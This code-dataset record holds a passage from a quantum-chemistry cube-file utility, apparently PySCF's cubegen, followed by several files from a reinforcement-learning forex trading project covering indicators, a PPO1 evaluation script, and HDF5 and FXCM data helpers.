coord = mol.atom_coords()
# If the molecule is periodic, use lattice vectors as the box
# and automatically determine margin, origin, and extent
if isinstance(mol, Cell):
self.box = mol.lattice_vectors()
atom_center = (numpy.max(coord, axis=0) + numpy.min(coord, axis=0))/2
box_center = (self.box[0] + self.box[1] + self.box[2])/2
self.boxorig = atom_center - box_center
else:
# Create a box based on its origin and extents/lengths (rectangular cuboid only)
# If extent is not supplied, use the coordinates plus a margin on both sides
if extent is None:
extent = numpy.max(coord, axis=0) - numpy.min(coord, axis=0) + 2*margin
self.box = numpy.diag(extent)
# if origin is not supplied, set it as the minimum coordinate minus a margin.
if origin is None:
origin = numpy.min(coord, axis=0) - margin
self.boxorig = numpy.asarray(origin)
if resolution is not None:
nx, ny, nz = numpy.ceil(numpy.diag(self.box) / resolution).astype(int)
self.nx = nx
self.ny = ny
self.nz = nz
if isinstance(mol, Cell):
# Use an asymmetric mesh for tiling unit cells
self.xs = numpy.linspace(0, 1, nx, endpoint=False)
self.ys = numpy.linspace(0, 1, ny, endpoint=False)
self.zs = numpy.linspace(0, 1, nz, endpoint=False)
else:
# Use endpoint=True to get a symmetric mesh
# see also the discussion https://github.com/sunqm/pyscf/issues/154
self.xs = numpy.linspace(0, 1, nx, endpoint=True)
self.ys = numpy.linspace(0, 1, ny, endpoint=True)
self.zs = numpy.linspace(0, 1, nz, endpoint=True)
def get_coords(self) :
""" Result: set of coordinates to compute a field which is to be stored
in the file.
"""
frac_coords = lib.cartesian_prod([self.xs, self.ys, self.zs])
return frac_coords @ self.box + self.boxorig # Convert fractional coordinates to real-space coordinates
def get_ngrids(self):
return self.nx * self.ny * self.nz
def get_volume_element(self):
return (self.xs[1]-self.xs[0])*(self.ys[1]-self.ys[0])*(self.zs[1]-self.zs[0])
def write(self, field, fname, comment=None):
""" Result: .cube file with the field in the file fname. """
assert(field.ndim == 3)
assert(field.shape == (self.nx, self.ny, self.nz))
if comment is None:
comment = 'Generic field? Supply the optional argument "comment" to define this line'
mol = self.mol
coord = mol.atom_coords()
with open(fname, 'w') as f:
f.write(comment+'\n')
f.write(f'PySCF Version: {pyscf.__version__} Date: {time.ctime()}\n')
f.write(f'{mol.natm:5d}')
f.write('%12.6f%12.6f%12.6f\n' % tuple(self.boxorig.tolist()))
delta = (self.box.T * [self.xs[1], self.ys[1], self.zs[1]]).T
f.write(f'{self.nx:5d}{delta[0,0]:12.6f}{delta[0,1]:12.6f}{delta[0,2]:12.6f}\n')
f.write(f'{self.ny:5d}{delta[1,0]:12.6f}{delta[1,1]:12.6f}{delta[1,2]:12.6f}\n')
f.write(f'{self.nz:5d}{delta[2,0]:12.6f}{delta[2,1]:12.6f}{delta[2,2]:12.6f}\n')
for ia in range(mol.natm):
atmsymb = mol.atom_symbol(ia)
f.write('%5d%12.6f'% (gto.charge(atmsymb), 0.))
f.write('%12.6f%12.6f%12.6f\n' % tuple(coord[ia]))
for ix in range(self.nx):
for iy in range(self.ny):
for iz0, iz1 in lib.prange(0, self.nz, 6):
fmt = '%13.5E' * (iz1-iz0) + '\n'
f.write(fmt % tuple(field[ix,iy,iz0:iz1].tolist()))
def read(self, cube_file):
with open(cube_file, 'r') as f:
f.readline()
f.readline()
data = f.readline().split()
natm = int(data[0])
self.boxorig = numpy.array([float(x) for x in data[1:]])
def parse_nx(data):
d = data.split()
return int(d[0]), numpy.array([float(x) for x in d[1:]])
self.nx, self.xs = parse_nx(f.readline())
self.ny, self.ys = parse_nx(f.readline())
self.nz, self.zs = parse_nx(f.readline())
atoms = []
for ia in range(natm):
d = f.readline().split()
atoms.append([int(d[0]), [float(x) for x in d[2:]]])
self.mol = gto.M(atom=atoms, unit='Bohr')
data = f.read()
cube_data = numpy.array([float(x) for x in data.split()])
return cube_data.reshape([self.nx, self.ny, self.nz])
if __name__ == '__main__':
from pyscf import scf
from pyscf.tools import cubegen
mol = gto.M(atom='''O 0.00000000, 0.000000, 0.000000
H 0.761561, 0.478993, 0.00000000
H -0.761561, 0.478993, 0.00000000''', basis='6-31g*')
mf = scf.RHF(mol).run()
cubegen.density(mol, 'h2o_den.cube', mf.make_rdm1()) #makes total density
cubegen.mep(mol, 'h2o_pot.cube', mf.make_rdm1())
cubegen.orbital(mol, 'h2o_mo1.cube', mf.mo_coeff[:,0])
```
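Beyond the `__main__` example, the `Cube` class above can also be used directly for a write/read round trip; a short sketch (the molecule, grid size, and file name are illustrative):
```python
import numpy
from pyscf import gto
from pyscf.tools.cubegen import Cube
mol = gto.M(atom='H 0 0 0; H 0 0 0.74', basis='sto-3g')
cc = Cube(mol, nx=20, ny=20, nz=20)
field = numpy.zeros((cc.nx, cc.ny, cc.nz))    # any real-space field on the cube grid
cc.write(field, 'empty.cube', comment='All-zero test field')
data = cc.read('empty.cube')                  # parses the header and returns the field
print(data.shape)                             # (20, 20, 20)
```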
|
{
"source": "jezuina/drl-trading",
"score": 2
}
|
#### File: drl-trading/features/ta.py
```python
import sys
sys.path.append("..")
import talib._ta_lib as talib
import numpy as np
from utils.math import my_log
def get_indicators_returns(security, open_name, high_name, low_name, close_name, volume_name):
# LOG_RR
# security['LOG_RR_0'] = my_log(security[close_name].shift(0).fillna(1) / security[open_name].shift(0).fillna(1))
security['LOG_RR_1'] = my_log(security[close_name].shift(1).fillna(1) / security[open_name].shift(1).fillna(1))
security['LOG_RR_2'] = my_log(security[close_name].shift(2).fillna(1) / security[open_name].shift(2).fillna(1))
security['LOG_RR_3'] = my_log(security[close_name].shift(3).fillna(1) / security[open_name].shift(3).fillna(1))
security['LOG_RR_4'] = my_log(security[close_name].shift(4).fillna(1) / security[open_name].shift(4).fillna(1))
security['LOG_RR_5'] = my_log(security[close_name].shift(5).fillna(1) / security[open_name].shift(5).fillna(1))
security['LOG_RR_6'] = my_log(security[close_name].shift(6).fillna(1) / security[open_name].shift(6).fillna(1))
security['LOG_RR_7'] = my_log(security[close_name].shift(7).fillna(1) / security[open_name].shift(7).fillna(1))
security['LOG_RR_8'] = my_log(security[close_name].shift(8).fillna(1) / security[open_name].shift(8).fillna(1))
security['LOG_RR_9'] = my_log(security[close_name].shift(9).fillna(1) / security[open_name].shift(9).fillna(1))
security['LOG_RR_10'] = my_log(security[close_name].shift(10).fillna(1) / security[open_name].shift(10).fillna(1))
security = security.dropna().astype(np.float32)
return security
```
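The ten hand-written `LOG_RR_*` assignments in `get_indicators_returns` all follow one pattern; a loop-based equivalent is sketched below (the helper name `add_log_rr_columns` is invented, and the same package layout is assumed for the `my_log` import):
```python
from utils.math import my_log
def add_log_rr_columns(security, open_name, close_name, n_lags=10):
    # Lagged log return of close over open for lags 1..n_lags, as in the file above.
    for k in range(1, n_lags + 1):
        security[f'LOG_RR_{k}'] = my_log(
            security[close_name].shift(k).fillna(1)
            / security[open_name].shift(k).fillna(1)
        )
    return security
```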
#### File: jezuina/drl-trading/ppo1_fx_test.py
```python
import numpy as np
import matplotlib.pyplot as plt
import pyfolio as pf
from stable_baselines.common.vec_env import DummyVecEnv, VecNormalize
from stable_baselines import PPO1
from envs.pf_fx_env import PortfolioEnv
from utils.globals import EPS, MODELS_DIR
from utils.enums import compute_indicators, compute_reward, compute_position, lot_size
settings = {
# env
'data_file': 'fxcm_XXXUSD_H4_2015_2019_test_1983.h5',
# 'data_file': 'fxcm_EURUSD_H1_2019_2019_test_6232.h5',
'output_file': None,
'strategy_name': 'Strategy',
'total_steps': 1900,
'window_length': 1,
'capital_base': 1e4,
'lot_size': lot_size.Mini,
'leverage': 0.01,
'commission_percent': 0.0,
'commission_fixed': 0.0,
'max_slippage_percent': 0.1,
'start_idx': 1,
'compute_indicators': compute_indicators.returns, #
'compute_reward': compute_reward.profit, # profit sharpe sortino max_drawdown calmar omega downside risk
'compute_position': compute_position.long_and_short, # long_only short_only long_and_short add long/short bias for stocks
'add_noise': False,
'debug': False,
'model_name': 'fxcm_XXXUSD_H4_2015_2019_train_5990_ppo1_1000000_1_compute_indicators.returns_0.99_d955a70fac7449ec',
# 'model_name': 'fxcm_EURUSD_H1_2018_2019_train_10558_ppo1_1000000_1_compute_indicators.returns_0.99_b00a387ebda14a1a',
    # agent
'norm_obs': True,
'norm_reward': True,
'clip_obs': 10,
'clip_reward': 10
}
p_gamma = 0.9
def ppo1_test():
    v_env = PortfolioEnv(
        settings['data_file'], settings['output_file'], settings['strategy_name'],
        settings['total_steps'], settings['window_length'], settings['capital_base'],
        settings['lot_size'], settings['leverage'], settings['commission_percent'],
        settings['commission_fixed'], settings['max_slippage_percent'], settings['start_idx'],
        settings['compute_indicators'], settings['compute_reward'], settings['compute_position'],
        settings['debug'],
    )
# Create the vectorized environment
# v_env = DummyVecEnv([lambda: v_env])
# Normalize environment
# v_env = VecNormalize(v_env, norm_obs=settings['norm_obs'], norm_reward=settings['norm_reward'], clip_obs=settings['clip_obs'], clip_reward=settings['clip_reward'], gamma=p_gamma, epsilon=EPS)
model = PPO1.load(MODELS_DIR + settings['model_name'])
# Strategy
obs = v_env.reset()
dones = False
while not dones:
action, _states = model.predict(obs, deterministic=True)
obs, rewards, dones, info = v_env.step(action)
# v_env.render(mode='ansi')
v_env.strategy_name = 'fxcm_XXXUSD_H4 returns PPO1'
v_env.render(mode='human')
# pv,pp,pw=v_env.get_summary()
# pr=pv.sum(axis=1).pct_change().fillna(0)
pr = v_env.returns
# Random agent
obs = v_env.reset()
dones = False
while not dones:
# action, _states = model.predict(obs, deterministic=True)
action = v_env.action_sample
obs, rewards, dones, info = v_env.step(action)
# v_env.render(mode='ansi')
v_env.strategy_name = 'Random agent'
v_env.render(mode='human')
# Buy and hold
obs = v_env.reset()
dones = False
    # Equal weight per instrument, plus one extra slot (presumably cash) left at 0
    weights = np.concatenate((np.ones(len(v_env.instruments)) / len(v_env.instruments), [0]))
    # print(weights)
while not dones:
obs, rewards, dones, info = v_env.step(action=weights)
weights=v_env.current_weights
v_env.render(mode='ansi')
v_env.strategy_name = 'Buy and hold'
v_env.render(mode='human')
    # bpv, bpp, bpw = v_env.get_summary()
    # bpr = bpv.sum(axis=1).pct_change().fillna(0)
    bpr = v_env.returns
'''
# Extended
pv,pp,pw=v_env.get_summary()
pv.sum(axis=1).plot()
plt.title('strategy')
plt.show()
bpv,bpp,bpw=v_env.get_summary()
bpv.sum(axis=1).plot()
plt.title('buy and hold')
plt.show()
pr=pv.sum(axis=1).pct_change().fillna(0)
bpr=bpv.sum(axis=1).pct_change().fillna(0)
'''
# pf.create_simple_tear_sheet(returns=pr,benchmark_rets=bpr)
pf.create_full_tear_sheet(returns=pr,benchmark_rets=bpr)
# Evaluate trading system defined in current file.
if __name__ == '__main__':
ppo1_test()
```
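The tear-sheet comparison at the end assumes the environment's `returns` attribute yields a pandas Series of simple period returns. A minimal sketch of how pyfolio consumes such series, with synthetic data standing in for the environment output:
```python
import numpy as np
import pandas as pd
import pyfolio as pf

# Synthetic business-day returns standing in for the strategy and the buy-and-hold benchmark
idx = pd.date_range('2019-01-01', periods=250, freq='B', tz='UTC')
np.random.seed(0)
strategy_rets = pd.Series(np.random.normal(0.0005, 0.01, len(idx)), index=idx)
benchmark_rets = pd.Series(np.random.normal(0.0003, 0.01, len(idx)), index=idx)

# Same call pattern as ppo1_test(), using the simpler variant for a quicker report
pf.create_simple_tear_sheet(returns=strategy_rets, benchmark_rets=benchmark_rets)
```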
#### File: drl-trading/utils/data.py
```python
import h5py
import numpy as np
import pandas as pd
import fxcmpy
import datetime as dt
def pandas_fill(arr):
    """Replace zeros with NaN, then forward/backward fill along the time axis."""
    arr = arr.astype('float')
    arr[arr == 0] = np.nan
    # History arrays are (instruments, timesteps, features); fill each 2-D slice separately
    if arr.ndim == 3:
        return np.stack([pandas_fill(a) for a in arr])
    df = pd.DataFrame(arr)
    df.fillna(method='ffill', axis=0, inplace=True)
    df.fillna(method='bfill', axis=0, inplace=True)
    return df.to_numpy()
def read_h5_history(filepath, replace_zeros=True):
    ''' Read data from an extracted h5 file.
    Args:
        filepath: path of the h5 file
        replace_zeros: if True, zeros are replaced with the median of positive values
    Returns:
        history: numpy array of shape (instruments, timesteps, features)
        instruments: list of instrument names
    '''
with h5py.File(filepath, 'r') as f:
history = f['history'][:]
        if replace_zeros:
            # Replace NaNs with 0, then substitute zeros with the median of positive values
            history = np.nan_to_num(history)
            mn = np.median(history[history > 0])
            history[history == 0] = mn
# instruments = ['rand']
instruments = f['instruments'][:].tolist()
instruments = [instrument.decode('utf-8') for instrument in instruments]
'''
try:
instruments = f['instruments'][:].tolist()
instruments = [instrument.decode('utf-8') for instrument in instruments]
except:
instruments = f['instruments']
'''
print('history has NaNs: {}, has infs: {}'.format(np.any(np.isnan(history)), np.any(np.isinf(history))))
return history, instruments
def read_h5_fx_history(filepath, replace_zeros=True):
    ''' Read history, bid and ask data from an extracted h5 file.
    Args:
        filepath: path of the h5 file
        replace_zeros: if True, zeros are replaced with the median of positive values
    Returns:
        history, bid, ask: numpy arrays of shape (instruments, timesteps, features)
        instruments: list of instrument names
    '''
with h5py.File(filepath, 'r') as f:
history = f['history'][:]
        bid = f['bid'][:]
        ask = f['ask'][:]
        if replace_zeros:
            # Replace NaNs with 0, then substitute zeros with the median of positive values
            history = np.nan_to_num(history)
            history[history == 0] = np.median(history[history > 0])
            bid = np.nan_to_num(bid)
            bid[bid == 0] = np.median(bid[bid > 0])
            ask = np.nan_to_num(ask)
            ask[ask == 0] = np.median(ask[ask > 0])
instruments = f['instruments'][:].tolist()
instruments = [instrument.decode('utf-8') for instrument in instruments]
'''
try:
instruments = f['instruments'][:].tolist()
instruments = [instrument.decode('utf-8') for instrument in instruments]
except:
instruments = f['instruments']
'''
print('history has NaNs: {}, has infs: {}'.format(np.any(np.isnan(history)), np.any(np.isinf(history))))
print('bid has NaNs: {}, has infs: {}'.format(np.any(np.isnan(bid)), np.any(np.isinf(bid))))
print('ask has NaNs: {}, has infs: {}'.format(np.any(np.isnan(ask)), np.any(np.isinf(ask))))
return history, bid, ask, instruments
def write_to_h5py(history, instruments, filepath):
""" Write a numpy array history and a list of string to h5py
Args:
history: (N, timestamp, 5)
instruments: a list of stock instruments
Returns:
"""
with h5py.File(filepath, 'w') as f:
f.create_dataset('history', data=history)
instruments_array = np.array(instruments, dtype=object)
# string_dt = h5py.special_dtype(vlen=str)
string_dt = h5py.special_dtype(vlen=bytes)
f.create_dataset("instruments", data=instruments_array, dtype=string_dt)
def write_fx_to_h5py(history, bid, ask, instruments, filepath, fill_missing_values):
""" Write a numpy array history and a list of string to h5py
Args:
history: (N, timestamp, 5)
instruments: a list of stock instruments
Returns:
"""
if fill_missing_values:
history = pandas_fill(history)
with h5py.File(filepath, 'w') as f:
f.create_dataset('history', data=history)
f.create_dataset('bid', data=bid)
f.create_dataset('ask', data=ask)
instruments_array = np.array(instruments, dtype=object)
# string_dt = h5py.special_dtype(vlen=str)
string_dt = h5py.special_dtype(vlen=bytes)
f.create_dataset("instruments", data=instruments_array, dtype=string_dt)
def download_fxcm_data(data_file, instruments, period, start_date, end_date):
conn = fxcmpy.fxcmpy(config_file='./config/fxcm.cfg', server='demo')
    history = np.empty(shape=(len(instruments), 0, 14), dtype=np.float64)
m = 0
'''
npdata = data.to_numpy()
npdata = npdata [:,1:6]
print(npdata)
print(np.shape(npdata))
'''
for instrument in instruments:
data = conn.get_candles(instrument, period=period, start=start_date, stop=end_date)
df_data = pd.DataFrame(data)
Open = pd.DataFrame(data[['bidopen', 'askopen']].mean(axis=1), columns=['Open'])
High = pd.DataFrame(data[['bidhigh', 'askhigh']].mean(axis=1), columns=['High'])
Low = pd.DataFrame(data[['bidlow', 'asklow']].mean(axis=1), columns=['Low'])
Close = pd.DataFrame(data[['bidclose', 'askclose']].mean(axis=1), columns=['Close'])
Volume = pd.DataFrame(data[['tickqty']].mean(axis=1), columns=['Volume'])
df = pd.concat([Open, High, Low, Close, Volume, df_data], axis=1)
# export_csv = df.to_csv (r'C:\Users\hanna\Desktop\export_dataframe.csv', index = None, header=True)
npdata = df.to_numpy()
print(npdata)
history = np.resize(history, (history.shape[0], npdata.shape[0], history.shape[2]))
for d in range(npdata.shape[0]):
# print(np.shape(history))
            history[m][d] = npdata[d, :14]
m += 1
write_to_h5py(history, instruments, data_file)
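# Example call for download_fxcm_data (hypothetical file name and date range; requires a
# valid ./config/fxcm.cfg and an fxcmpy demo account):
# download_fxcm_data('data/fxcm_majors_H4.h5', ['EUR/USD', 'GBP/USD'], 'H4',
#                    dt.datetime(2015, 1, 1), dt.datetime(2019, 12, 31))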
def read_csv_history(data_file, instruments, granularity, price, replace_zero=True):
    ''' Read per-instrument OHLCV data from CSV files.
    Args:
        data_file: path template containing 'instrument', 'granularity' and 'price' placeholders
        instruments: list of instrument names
        granularity: bar granularity token substituted into the path
        price: price type token substituted into the path
    Returns:
        history: numpy array of shape (instruments, timesteps, 5)
    '''
    history = np.empty(shape=(len(instruments), 0, 5), dtype=np.float64)
m = 0
    for instrument in instruments:
        # str.replace returns a new string, so build the concrete path without mutating the template
        file_path = data_file.replace('instrument', instrument).replace('granularity', granularity).replace('price', price)
        print(file_path)
        data = pd.read_csv(file_path)
npdata = data.to_numpy()
npdata = npdata [:,1:6]
print(np.shape(npdata))
history = np.resize(history, (history.shape[0], npdata.shape[0], history.shape[2]))
for d in range(npdata.shape[0]):
# print(np.shape(history))
            history[m][d] = npdata[d, :5]
m += 1
return history
```
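For completeness, a small round-trip sketch of `write_to_h5py` and `read_h5_history` with synthetic data, assuming the module above is importable as `utils.data` (the file name is illustrative):
```python
import numpy as np
from utils.data import write_to_h5py, read_h5_history

# Synthetic history: 2 instruments, 100 bars, 5 features (Open, High, Low, Close, Volume)
history = np.random.rand(2, 100, 5)
instruments = ['EUR/USD', 'GBP/USD']

write_to_h5py(history, instruments, 'example_history.h5')
loaded_history, loaded_instruments = read_h5_history('example_history.h5')
print(loaded_history.shape, loaded_instruments)
```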
|